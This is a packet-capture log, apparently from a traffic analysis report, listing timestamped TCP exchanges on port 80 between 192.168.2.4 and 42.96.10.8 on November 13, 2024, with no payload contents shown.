                                                                                                                                                                                                            Nov 13, 2024 13:25:23.175523996 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.175533056 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.175543070 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.175545931 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.175551891 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.175558090 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.175561905 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.175570965 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.175580978 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.175585032 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.175590038 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.175597906 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.175607920 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.175617933 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.175621033 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.175621033 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.175646067 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.175647974 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.175654888 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.175662994 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.175673008 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.175683022 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.175689936 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.175694942 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.175703049 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.175705910 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.175705910 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.175713062 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.175721884 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.175733089 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.175740004 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.175741911 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.175755024 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.175764084 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.175764084 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.175780058 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.175789118 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.175797939 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.175802946 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.175810099 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.175822020 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.175832987 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.175837994 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.175837994 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.175849915 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.175858974 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.175865889 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.175885916 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.175885916 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.175894976 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.175904036 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.175910950 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.175920010 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.175930023 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.175935984 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.175939083 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.175947905 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.175956964 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.175959110 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.175959110 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.175966024 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.175976038 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.175983906 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.175992012 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.176002026 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.176004887 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.176006079 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.176008940 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.176018000 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.176027060 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.176031113 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.176033020 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.176033020 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.176048040 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.176503897 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.176512957 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.176521063 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.176529884 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.176567078 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.176567078 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.176567078 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.176680088 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.176688910 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.176697016 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.176707029 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.176714897 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.176727057 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.176800013 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.176800013 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.176803112 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.176811934 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.176820040 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.176830053 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.176903009 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.176903009 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.176938057 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.176980972 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.176991940 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.177074909 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.177083015 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.177092075 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.177102089 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.177114010 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.177124023 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.177133083 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.177143097 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.177143097 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.177143097 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.177153111 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.177165985 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.177200079 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.177217007 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.177222967 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.177232027 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.177241087 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.177251101 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.177258968 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.177267075 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.177277088 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.177285910 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.177289009 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.177289009 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.177294970 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.177304983 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.177314997 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.177325964 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.177335978 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.177335978 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.177357912 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.177367926 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.177367926 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.177367926 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.177376986 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.177386999 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.177449942 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.177457094 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.177459955 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.177469015 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.177479029 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.177496910 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.177500010 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.177520990 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.177520990 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.177602053 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.177612066 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.177620888 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.177629948 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.177639961 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.177649021 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.177654982 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.177660942 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.177669048 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.177715063 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.177723885 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.177726984 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.177732944 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.177742958 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.177752972 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.177762985 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.177772999 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.177774906 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.177774906 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.177782059 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.177792072 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.177800894 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.177804947 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.177804947 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.177835941 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.177846909 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.177855015 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.177865028 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.177875042 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.177885056 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.177896023 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.177898884 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.177898884 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.177903891 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.177917004 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.177930117 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.177939892 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.177948952 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.177958965 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.177968979 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.177978992 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.177989006 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.177993059 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.177993059 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.177997112 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.178008080 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.178025961 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.178049088 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.178056955 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.178066969 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.178077936 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.178087950 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.178123951 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.178123951 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.178123951 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.178126097 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.178134918 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.178145885 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.178169966 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.178179026 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.178181887 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.178188086 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.178196907 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.178205013 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.178217888 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.178250074 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.178250074 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.178256989 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.178267002 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.178276062 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.178342104 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.178352118 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.178356886 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.178361893 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.178369999 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.178370953 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.178378105 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.178400993 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.178528070 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.178535938 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.178543091 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.178615093 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.178625107 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.178708076 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.178709030 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.178723097 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.178734064 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.178745031 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.178755045 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.178775072 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.178776979 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.178786039 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.178796053 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.178803921 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.178853035 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.178853035 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.178853035 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.178854942 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.178865910 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.178874969 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.178886890 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.178916931 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.178919077 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.178925991 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.178973913 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.178973913 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.179027081 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.179038048 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.179047108 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.179404974 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.179414988 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.179424047 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.179434061 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.179444075 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.179451942 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.179455042 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.179455042 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.179461002 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.179483891 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.179492950 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.179502010 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.179507017 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.179507017 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.179511070 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.179521084 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.179531097 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.179539919 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.179549932 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.179553032 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.179553032 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.179558992 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.179579020 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.179585934 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.179596901 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.179614067 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.179614067 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.179624081 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.179629087 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.179658890 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.179805994 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.179815054 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.179828882 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.179833889 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.179838896 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.179841995 CET804973342.96.10.8192.168.2.4
